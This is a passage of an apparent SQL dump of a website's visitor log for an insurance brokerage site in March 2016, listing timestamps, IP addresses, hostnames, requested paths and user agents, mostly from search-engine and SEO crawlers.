http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(4092,'0b_3ab7f85e1d02999232b68cef19f4df39','1457824584','69.50.234.142','static-69.50.234.142.nephosdns.com','/','Mozilla/5.0 (compatible; MixrankBot; crawler@mixrank.com)','','',0,'','','us','','','','','','','0','0',0),(4095,'0b_3ab7f85e1d02999232b68cef19f4df39','1457824593','69.50.234.142','static-69.50.234.142.nephosdns.com','/case-status/','Mozilla/5.0 (compatible; MixrankBot; crawler@mixrank.com)','','',0,'','','us','','','','','','','0','0',0),(4097,'0b_3ab7f85e1d02999232b68cef19f4df39','1457824598','69.50.234.142','static-69.50.234.142.nephosdns.com','/forms/','Mozilla/5.0 (compatible; MixrankBot; crawler@mixrank.com)','','',0,'','','us','','','','','','','0','0',0),(4098,'0b_3ab7f85e1d02999232b68cef19f4df39','1457824608','69.50.234.142','static-69.50.234.142.nephosdns.com','/igo/','Mozilla/5.0 (compatible; MixrankBot; crawler@mixrank.com)','','',0,'','','us','','','','','','','0','0',0),(4100,'0b_3ab7f85e1d02999232b68cef19f4df39','1457824617','69.50.234.142','static-69.50.234.142.nephosdns.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MixrankBot; crawler@mixrank.com)','','',0,'','','us','','','','','','','0','0',0),(4103,'0b_3ab7f85e1d02999232b68cef19f4df39','1457824618','69.50.234.142','static-69.50.234.142.nephosdns.com','/about-us/','Mozilla/5.0 (compatible; MixrankBot; crawler@mixrank.com)','','',0,'','','us','','','','','','','0','0',0),(4106,'0b_3ab7f85e1d02999232b68cef19f4df39','1457824620','69.50.234.142','static-69.50.234.142.nephosdns.com','/','Mozilla/5.0 (compatible; MixrankBot; crawler@mixrank.com)','','',0,'','','us','','','','','','','0','0',0),(4109,'0b_3ab7f85e1d02999232b68cef19f4df39','1457824622','69.50.234.142','static-69.50.234.142.nephosdns.com','/register/','Mozilla/5.0 (compatible; MixrankBot; crawler@mixrank.com)','','',0,'','','us','','','','','','','0','0',0),(4110,'0b_3ab7f85e1d02999232b68cef19f4df39','1457824623','69.50.234.142','static-69.50.234.142.nephosdns.com','/licensing-contracting/','Mozilla/5.0 (compatible; MixrankBot; crawler@mixrank.com)','','',0,'','','us','','','','','','','0','0',0),(4112,'0b_3ab7f85e1d02999232b68cef19f4df39','1457824627','69.50.234.142','static-69.50.234.142.nephosdns.com','/term-quotes/','Mozilla/5.0 (compatible; MixrankBot; crawler@mixrank.com)','','',0,'','','us','','','','','','','0','0',0),(4113,'0b_2d85bb9eb75695a550106f839b840684','1457826390','62.210.90.118','62-210-90-118.rev.poneytelecom.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(4115,'0b_2d85bb9eb75695a550106f839b840684','1457826392','62.210.90.118','62-210-90-118.rev.poneytelecom.eu','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(4116,'0b_0c6ec7dfda54f99612576b361e1c1416','1457826402','69.30.213.82','69.30.213.82','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(4119,'0b_0c6ec7dfda54f99612576b361e1c1416','1457826412','69.30.213.82','69.30.213.82','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(4121,'0b_b45f1b6e3b55b6eafdee5e663561d9a2','1457827228','52.73.146.124','ec2-52-73-146-124.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36','','',0,'Win7','Chrome 28','us','','','','','','','0','0',0),(4124,'0b_f7dfe5f63958916f3c0b0d161a7a1a98','1457827383','69.30.205.218','69.30.205.218','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(4125,'0b_f7dfe5f63958916f3c0b0d161a7a1a98','1457827394','69.30.205.218','69.30.205.218','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(4127,'0b_f7dfe5f63958916f3c0b0d161a7a1a98','1457827405','69.30.205.218','69.30.205.218','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(4130,'0b_286c287e09d3f0d631087e897f3041f8','1457830763','100.43.81.146','spider-100-43-81-146.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(4131,'0b_7c7e3b8b5855e093397285609fec8742','1457831027','208.115.111.66','208-115-111-66-reverse.wowrack.com','/carriers/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(4133,'0b_4c5602b90fa837f3c1aeeb60c56343a3','1457832029','66.249.73.187','crawl-66-249-73-187.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(4136,'0b_36fb249d171e4d10af7d8b4881bd741f','1457832847','51.254.131.245','245.ip-51-254-131.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(4137,'0b_36fb249d171e4d10af7d8b4881bd741f','1457832850','51.254.131.245','245.ip-51-254-131.eu','/?p=283','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(4139,'0b_36fb249d171e4d10af7d8b4881bd741f','1457832853','51.254.131.245','245.ip-51-254-131.eu','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(4142,'0b_10403071138e52c585824cb378471a4c','1457834024','69.30.213.82','69.30.213.82','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(4143,'0b_10403071138e52c585824cb378471a4c','1457834035','69.30.213.82','69.30.213.82','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(4145,'0b_832677c46d7180ab128acaa27d6a7bf2','1457834549','40.77.167.90','msnbot-40-77-167-90.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4146,'0b_e90eb93088cb21fb2835d90d31442ba3','1457838056','180.76.15.145','baiduspider-180-76-15-145.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(4149,'0b_2ce7185c38adcc15eb7e16821fa72aed','1457841075','62.210.90.118','62-210-90-118.rev.poneytelecom.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(4151,'0b_2ce7185c38adcc15eb7e16821fa72aed','1457841077','62.210.90.118','62-210-90-118.rev.poneytelecom.eu','/register/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(4152,'0b_3482d91fcc97410bc6ec51333ab12ffa','1457841460','40.77.167.46','msnbot-40-77-167-46.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4154,'0b_be6432f3c78d356e365e1390f111beec','1457845290','157.55.39.170','msnbot-157-55-39-170.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4155,'0b_ee68d50434d9a0b3a4a40645996d2b50','1457845391','49.204.217.119','119.217.204.49-ras.beamtele.net','/?author=1','Mozilla/5.0 (Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20100101 Firefox/8.0','','',0,'WinXP','Firefox 8','us','','','','','','','0','0',0),(4157,'0b_ee68d50434d9a0b3a4a40645996d2b50','1457845393','49.204.217.119','119.217.204.49-ras.beamtele.net','/author/admin/','Mozilla/5.0 (Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20100101 Firefox/8.0','http://www.empireins.com/?author=1','',0,'WinXP','Firefox 8','us','','','','','','','0','0',0),(4158,'0b_47e276852f6f2866e3f93b32f6daa041','1457846535','40.77.167.10','msnbot-40-77-167-10.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(4160,'0b_be6432f3c78d356e365e1390f111beec','1457846858','157.55.39.159','msnbot-157-55-39-159.search.msn.com','/members/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4163,'0b_774fbef2fb8d8b4cbd8f6be75f63a269','1457847211','40.77.167.46','msnbot-40-77-167-46.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4164,'0b_f00d8b0deb4cc384f8a321bafcb7fbf6','1457847250','198.23.212.115','198-23-212-115-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(4166,'0b_dd1a3afc4f8f7c9a2155e9a895494924','1457848030','103.13.84.194','fortinet.m2digital.com.au','/js/mage/cookies.js','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','empireins.com','',0,'WinXP','Chrome 5','au','','','','','','','3','0',0),(4169,'0b_fbc89652133c1a487cd2676033e86ea6','1457849621','66.249.73.169','crawl-66-249-73-169.googlebot.com','/members/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(4172,'0b_c1bf2b46faa4e2a244a61ad9c12a13c0','1457850789','40.77.167.10','msnbot-40-77-167-10.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4173,'0b_fec371730a6b8cb8e73274b18683ce56','1457851551','51.255.65.5','hydrogen003.ahrefs.com','/contact/feed/','Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(4175,'0b_c1bf2b46faa4e2a244a61ad9c12a13c0','1457852297','40.77.167.10','msnbot-40-77-167-10.search.msn.com','/companylinks.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4178,'0b_75b84b21e9f123811a21bd99ef658b38','1457853839','66.249.73.187','crawl-66-249-73-187.googlebot.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(4179,'0b_2899a20e6040567232328afafbca76d0','1457855294','157.55.39.170','msnbot-157-55-39-170.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4182,'0b_581e0ab2559b30a2400ba3e42f84b9ce','1457855355','40.77.167.10','msnbot-40-77-167-10.search.msn.com','/companylinks.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4185,'0b_3b5381ce73e5ab46b4e817ff0daa5c64','1457858595','207.241.229.50','crawl812.us.archive.org','/robots.txt','Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)','','',0,'','','','','','org_bot','','','','0','0',0),(4188,'0b_3b5381ce73e5ab46b4e817ff0daa5c64','1457859498','207.241.229.50','crawl812.us.archive.org','/robots.txt','Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)','','',0,'','','','','','org_bot','','','','0','0',0),(4191,'0b_69c6a800f7ac9360a7fdfaf60c56fb38','1457859875','144.76.93.46','static.46.93.76.144.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(4194,'0b_69c6a800f7ac9360a7fdfaf60c56fb38','1457859877','144.76.93.46','static.46.93.76.144.clients.your-server.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(4196,'0b_f4de1ca9978003a681aa2d2c5ca10fa8','1457860404','207.241.229.50','crawl812.us.archive.org','/robots.txt','Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)','','',0,'','','','','','org_bot','','','','0','0',0),(4199,'0b_f4de1ca9978003a681aa2d2c5ca10fa8','1457861309','207.241.229.50','crawl812.us.archive.org','/robots.txt','Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)','','',0,'','','','','','org_bot','','','','0','0',0),(4200,'0b_674f00d317e81e2b82523c77fda6a98e','1457861602','40.77.167.46','msnbot-40-77-167-46.search.msn.com','/illustration.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4202,'0b_9b3e61a1912207d6edda1a6c9b9067ea','1457862211','207.241.229.50','crawl812.us.archive.org','/robots.txt','Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)','','',0,'','','','','','org_bot','','','','0','0',0),(4203,'0b_9b3e61a1912207d6edda1a6c9b9067ea','1457863112','207.241.229.50','crawl812.us.archive.org','/robots.txt','Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)','','',0,'','','','','','org_bot','','','','0','0',0),(4205,'0b_9b3e61a1912207d6edda1a6c9b9067ea','1457863121','207.241.229.50','crawl812.us.archive.org','/','Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)','','',0,'','','','','','org_bot','','','','0','0',0),(4208,'0b_eb3bfde6eca78d40580df079fa890aa0','1457867223','157.55.39.159','msnbot-157-55-39-159.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4211,'0b_d08af6d92585dd8210a711ef25f7a8c6','1457869717','52.7.174.126','ec2-52-7-174-126.compute-1.amazonaws.com','/','python-requests/2.9.1','','',0,'','','','','','python','','','','0','0',0),(4212,'0b_6a8e258b0432911f290cef34788087a0','1457870068','64.202.160.250','ip-64-202-160-250.secureserver.net','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'MacOSX','Chrome 48','','','','','','','','0','0',0),(4214,'0b_386fda97b46020df507887f1628f70bc','1457870114','180.76.15.31','baiduspider-180-76-15-31.crawl.baidu.com','/about-us/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(4215,'0b_278442010a1817155f56d7fde9b7625a','1457871930','157.55.39.170','msnbot-157-55-39-170.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4218,'0b_5b97fb077a3575d6540ce3b8dd9442c5','1457873102','66.249.73.187','crawl-66-249-73-187.googlebot.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(4221,'0b_78a877bd554b8225d2e692585f432d9a','1457874775','66.249.73.189','crawl-66-249-73-189.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(4223,'0b_78a877bd554b8225d2e692585f432d9a','1457874775','66.249.73.189','crawl-66-249-73-189.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(4226,'0b_8af0f8b84102dfe3351ac706e871fd61','1457875985','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(4229,'0b_5951c9d7d5ab48abdf0b609c3cd51dd8','1457877128','66.249.73.187','crawl-66-249-73-187.googlebot.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(4232,'0b_5951c9d7d5ab48abdf0b609c3cd51dd8','1457877259','66.249.73.187','crawl-66-249-73-187.googlebot.com','/case-status/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(4235,'0b_9b6724fb1142749dacd24cc8884665f9','1457881258','69.175.67.58','newscan04.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(4238,'0b_9b6724fb1142749dacd24cc8884665f9','1457881261','69.175.67.58','newscan04.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(4239,'0b_9b6724fb1142749dacd24cc8884665f9','1457881276','69.175.67.58','newscan04.sitelock.com','/forms/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(4241,'0b_9b6724fb1142749dacd24cc8884665f9','1457881281','69.175.67.58','newscan04.sitelock.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(4242,'0b_efb02605df1e7eff682245a58b119af6','1457882639','40.77.167.46','msnbot-40-77-167-46.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4245,'0b_eb5263bd77ea337d6bba5e17760bc4da','1457882960','180.76.15.23','baiduspider-180-76-15-23.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(4247,'0b_2b76afeab99d59ea20a29a443af11e4d','1457885371','66.87.117.119','66-87-117-119.pools.spcsdns.net','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D20 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','320 x 568','','','','','','0','0',0),(4248,'0b_2b76afeab99d59ea20a29a443af11e4d','1457885373','66.87.117.119','66-87-117-119.pools.spcsdns.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D20 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','320 x 568','','','','','','0','0',0),(4251,'0b_2b76afeab99d59ea20a29a443af11e4d','1457885381','66.87.117.119','66-87-117-119.pools.spcsdns.net','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D20 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','320 x 568','','','','','','0','51',0),(4254,'0b_2b76afeab99d59ea20a29a443af11e4d','1457885381','66.87.117.119','66-87-117-119.pools.spcsdns.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D20 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','320 x 568','','','','','','0','0',0),(4257,'0b_2b76afeab99d59ea20a29a443af11e4d','1457885382','66.87.117.119','66-87-117-119.pools.spcsdns.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D20 Safari/601.1','http://www.empireins.com/','',0,'iPhone OS','Safari 9 Mobile','us','320 x 568','','','','','','0','0',0),(4260,'0b_2b76afeab99d59ea20a29a443af11e4d','1457885388','66.87.117.119','66-87-117-119.pools.spcsdns.net','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D20 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','320 x 568','','','','','','0','51',0),(4263,'0b_2b76afeab99d59ea20a29a443af11e4d','1457885389','66.87.117.119','66-87-117-119.pools.spcsdns.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D20 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','320 x 568','','','','','','0','0',0),(4265,'0b_539c41cc643ac64951019b7abbe6e4e0','1457886413','52.37.186.234','ec2-52-37-186-234.us-west-2.compute.amazonaws.com','/meet-the-eib-team/','Mozilla/5.0','','',0,'','','','','','','','','','0','0',0),(4266,'0b_539c41cc643ac64951019b7abbe6e4e0','1457886415','52.37.186.234','ec2-52-37-186-234.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0','','',0,'','','','','','','','','','0','0',0),(4268,'0b_2bfc99cf24d185e287f0077509f1f4cf','1457886553','157.55.39.159','msnbot-157-55-39-159.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4269,'0b_b59346dd15ac8fac513b4aa057c741f1','1457886837','69.30.198.186','69.30.198.186','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(4272,'0b_b59346dd15ac8fac513b4aa057c741f1','1457886851','69.30.198.186','69.30.198.186','/igo/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(4274,'0b_b59346dd15ac8fac513b4aa057c741f1','1457886864','69.30.198.186','69.30.198.186','/register/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(4277,'0b_60bb7aecaf97eec6646d6981b5e0cfe0','1457887829','45.79.89.188','li1188-188.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(4278,'0b_a5e84ef4bc1f76aaab9f360dfef27b02','1457888269','52.37.187.59','ec2-52-37-187-59.us-west-2.compute.amazonaws.com','/meet-the-eib-team/','Mozilla/5.0','','',0,'','','','','','','','','','0','0',0),(4281,'0b_277b6bc399fa56d0b6c0830ebb363b10','1457888736','66.249.83.217,108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/quotes.htm','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','us','','','','','','','0','0',0),(4283,'0b_54847c431f4cffc5ad0e160b501896dc','1457888891','52.37.187.59','ec2-52-37-187-59.us-west-2.compute.amazonaws.com','/meet-the-eib-team/','Mozilla/5.0','','',0,'','','','','','','','','','0','0',0),(4286,'0b_b70d3f21e37dcb57290ae01d60614df5','1457890997','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(4289,'0b_b70d3f21e37dcb57290ae01d60614df5','1457890999','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(4292,'0b_cbbe81b58982d4fd83683de9054771c4','1457894319','205.203.134.197','205.203.134.197','/robots.txt','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(4295,'0b_cbbe81b58982d4fd83683de9054771c4','1457894328','205.203.134.197','205.203.134.197','/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(4296,'0b_cbbe81b58982d4fd83683de9054771c4','1457894361','205.203.134.197','205.203.134.197','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(4299,'0b_cbbe81b58982d4fd83683de9054771c4','1457894375','205.203.134.197','205.203.134.197','/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(4301,'0b_cbbe81b58982d4fd83683de9054771c4','1457894386','205.203.134.197','205.203.134.197','/contact/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(4304,'0b_cbbe81b58982d4fd83683de9054771c4','1457894396','205.203.134.197','205.203.134.197','/about-us/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(4305,'0b_cbbe81b58982d4fd83683de9054771c4','1457894407','205.203.134.197','205.203.134.197','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(4307,'0b_cbbe81b58982d4fd83683de9054771c4','1457894417','205.203.134.197','205.203.134.197','/meet-the-eib-team/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(4310,'0b_cbbe81b58982d4fd83683de9054771c4','1457894429','205.203.134.197','205.203.134.197','/carriers/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(4311,'0b_cbbe81b58982d4fd83683de9054771c4','1457894441','205.203.134.197','205.203.134.197','/igo/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(4314,'0b_cbbe81b58982d4fd83683de9054771c4','1457894455','205.203.134.197','205.203.134.197','/agent-tools/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(4317,'0b_cbbe81b58982d4fd83683de9054771c4','1457894466','205.203.134.197','205.203.134.197','/insentives/','Mozilla/5.0 (compatible; Dow Jones 